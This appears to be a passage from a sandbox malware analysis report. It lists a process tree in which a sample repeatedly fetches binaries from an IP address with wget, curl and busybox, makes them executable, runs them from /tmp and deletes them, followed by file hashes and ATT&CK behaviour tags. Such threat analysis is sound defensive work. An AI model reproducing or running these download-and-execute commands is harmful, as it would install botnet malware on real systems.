PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:948
-
-
/bin/chmodchmod 777 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a./AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:954
-
-
/bin/chmodchmod 777 phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1./phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:956
-
-
/bin/rmrm phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- System Network Configuration Discovery
PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:960
-
-
/bin/chmodchmod 777 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh./NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:966
-
-
/bin/chmodchmod 777 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG./VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:972
-
-
/bin/chmodchmod 777 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP./YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:978
-
-
/bin/chmodchmod 777 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC./3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:981
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:982
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:984
-
-
/bin/chmodchmod 777 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM./LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:987
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:988
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:990
-
-
/bin/chmodchmod 777 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- File and Directory Permissions Modification
PID:991
-
-
/tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK./zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Executes dropped EXE
PID:992
-
-
/bin/rmrm zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:993
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97